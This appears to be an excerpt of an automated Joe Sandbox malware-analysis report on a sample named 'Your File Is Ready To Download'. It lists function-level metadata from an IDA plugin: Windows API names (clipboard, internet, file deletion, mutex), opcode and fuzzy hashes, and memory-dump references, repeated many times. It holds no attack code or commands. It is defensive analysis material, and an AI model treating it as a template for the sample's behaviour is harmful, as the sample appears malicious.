                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 9a28df70fbdf290dd78cd4ddb30b0f173d2bfb47a90d23c62d55db63974eb527
                                                                                                                                                                                                                          • Instruction ID: 7855b7bb2eeb03b3c973113677e8cc8557b52dedb264e7eb657bdefe72725fc5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a28df70fbdf290dd78cd4ddb30b0f173d2bfb47a90d23c62d55db63974eb527
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountInternetTick$CloseOpen$ClipboardGlobalHandleMessagePeekUnlock_wcstoi64
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2751744677-0
                                                                                                                                                                                                                          • Opcode ID: c3bda5223e949a7ecdb8972e57aa600a6df6d593daf1f7a4f8245ab1bb735fce
                                                                                                                                                                                                                          • Instruction ID: 38e4ad7461510981b81c8f150c49d8a1c2bdcc5a3b46700065ea4fcc9f0ff4e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3bda5223e949a7ecdb8972e57aa600a6df6d593daf1f7a4f8245ab1bb735fce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseDiskFreeGlobalMessagePeekSpaceUnlockwcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 833027430-0
                                                                                                                                                                                                                          • Opcode ID: d3ee416d11c09b8a4ae4f72ba9e9b490bec57b45befe560debef2eabf907810c
                                                                                                                                                                                                                          • Instruction ID: 553a405e31f4a0dc1c5e33571b45230c2ae121a4f21791e8b85100b0ea32cd75
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ee416d11c09b8a4ae4f72ba9e9b490bec57b45befe560debef2eabf907810c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 5fcaa9c066c759f5076e414069b735407fe929ae97d5a42c64cbe56ca920e950
                                                                                                                                                                                                                          • Instruction ID: 5c876327cc72e0f3f29ca1cdddd2924e357b27ad00b954d6ccffc1c2512b7eae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fcaa9c066c759f5076e414069b735407fe929ae97d5a42c64cbe56ca920e950
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$CloseCreateMessageMutexSleepThread$ClipboardCodeExitGlobalHandlePeekPostUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4035754557-0
                                                                                                                                                                                                                          • Opcode ID: 2cb5493f1a6bafe6eb580055fbaceb3c5a35c5bba7ac4a4a36394ee5afcefd85
                                                                                                                                                                                                                          • Instruction ID: 7ce1cb728a96b09f63c3bd7e9f92de065b0131278a93bc5dfe2f733907a5d6a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cb5493f1a6bafe6eb580055fbaceb3c5a35c5bba7ac4a4a36394ee5afcefd85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98814B31604B4486FB6B8B27E8443EA77A2F78DBE4F544216EB59476F6DB38C885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: d3cda11b9381bcfa88eb393704b2b6e5c2940d0d596bbeb5f06165a2f1f0a46d
                                                                                                                                                                                                                          • Instruction ID: ed0c2af0e71dd75dc7f1e453c784fcddf386cbc4ba9b2d8ef63401e8e3072f6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3cda11b9381bcfa88eb393704b2b6e5c2940d0d596bbeb5f06165a2f1f0a46d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ErrorLast$ClipboardCloseDeleteFileGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3770565981-0
                                                                                                                                                                                                                          • Opcode ID: a7c56f7efb72b2dd255e4fb87096636a1021718c5e7a8913a8ce9e33a525cebc
                                                                                                                                                                                                                          • Instruction ID: 9dcdd0168b16ca49a8e5f8af9d6ff8d8c18e4b19f99903745c7f567dd2a2250d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7c56f7efb72b2dd255e4fb87096636a1021718c5e7a8913a8ce9e33a525cebc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseFileFullGlobalMessageNameOperationPathPeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1286959346-0
                                                                                                                                                                                                                          • Opcode ID: bb8987fe031b948c033f4717a46debebad56f6670ceeec44d04c7e65671c7c25
                                                                                                                                                                                                                          • Instruction ID: e33556675c552dd3edca8b0ae113fdeb1b6e2f16c3eac416e9a8eeed8001e2d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8987fe031b948c033f4717a46debebad56f6670ceeec44d04c7e65671c7c25
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalKeyboardLayoutMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2243892272-0
                                                                                                                                                                                                                          • Opcode ID: f48bcfb16da020f79ab92f6760a380de56ebab94d94bdb13dd4666638034a1d1
                                                                                                                                                                                                                          • Instruction ID: 723cc532fe399c0620fca84a0f9c8e6cf512674f7db100b7f4426b71abf1cb01
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f48bcfb16da020f79ab92f6760a380de56ebab94d94bdb13dd4666638034a1d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F813931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 840ed05a1954207a951f37aa6ed649cb72f353d2d4e323712e6bbe947e5245ca
                                                                                                                                                                                                                          • Instruction ID: 06dff3d2993d034b20ff94198235f023606134cc5e9cc7a762992d2190d98af0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840ed05a1954207a951f37aa6ed649cb72f353d2d4e323712e6bbe947e5245ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F813C31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: ec465ce985f3590984f313cf95e74e87ee920b2bac1517a900fecdb38bbdb863
                                                                                                                                                                                                                          • Instruction ID: ee5d634fcf41254915d86c373dc42fdfc7f6f8b5312075923867e9f6d9002814
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec465ce985f3590984f313cf95e74e87ee920b2bac1517a900fecdb38bbdb863
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 6af4cafa7645ca0d19bb70a240b80c8d55da3761b7af51c436b3005c26da332b
                                                                                                                                                                                                                          • Instruction ID: 1b30798b1377f75516e605ea33ce9a3950fddf6f16ae8d23b6453b877e43e083
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6af4cafa7645ca0d19bb70a240b80c8d55da3761b7af51c436b3005c26da332b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D814B31604B408AFB6B8B27A8443EA77A2F78DBD4F544216EB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1623861271-0
                                                                                                                                                                                                                          • Opcode ID: 27719b4e66d859d05af943290ad14b01a9348f50b4a9763f99d21d76d44fa491
                                                                                                                                                                                                                          • Instruction ID: 0eede45efb6dbe6180b3eadb5b0033695b89b2d8e980fa6613eb0566b9fccf6b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27719b4e66d859d05af943290ad14b01a9348f50b4a9763f99d21d76d44fa491
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2814A31604B4086FB6B8B27A8443EA77A2F78DBE4F544216EB5947AF5DB38D885C700
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Timer$CountKillTick_wcstoi64
                                                                                                                                                                                                                          • String ID: Out of memory.
                                                                                                                                                                                                                          • API String ID: 806017027-4087320997
                                                                                                                                                                                                                          • Opcode ID: a6d08107c02996d88001bab1e8ae93ceb78ac514442e0b0d63dd071fc72e90f8
                                                                                                                                                                                                                          • Instruction ID: 1a71694c741cd85951e4a18acfd2b76b889b676dd512602cade19e755bea1baf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6d08107c02996d88001bab1e8ae93ceb78ac514442e0b0d63dd071fc72e90f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B991AF3250938485FBAB9B27A4103EA76E0E75CBD8F58801AEB46072F5DB78CC85C751
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesDirectoryFullNameOperationPathRemove
                                                                                                                                                                                                                          • String ID: \
                                                                                                                                                                                                                          • API String ID: 934956312-2967466578
                                                                                                                                                                                                                          • Opcode ID: abfacf19e0e2b0d56d8626a23501b17902ef0406dac0c3c1b513688cb21f9f0a
                                                                                                                                                                                                                          • Instruction ID: 69f54ea565988d367714232a65d9e8a6bbefc7d64edb126474b39be0452a495a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abfacf19e0e2b0d56d8626a23501b17902ef0406dac0c3c1b513688cb21f9f0a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C21303651878482EBA18F25B4843DEB3A4FB89760F541315F7E953AE8DB3CC55ACB10
                                                                                                                                                                                                                          Uniqueness
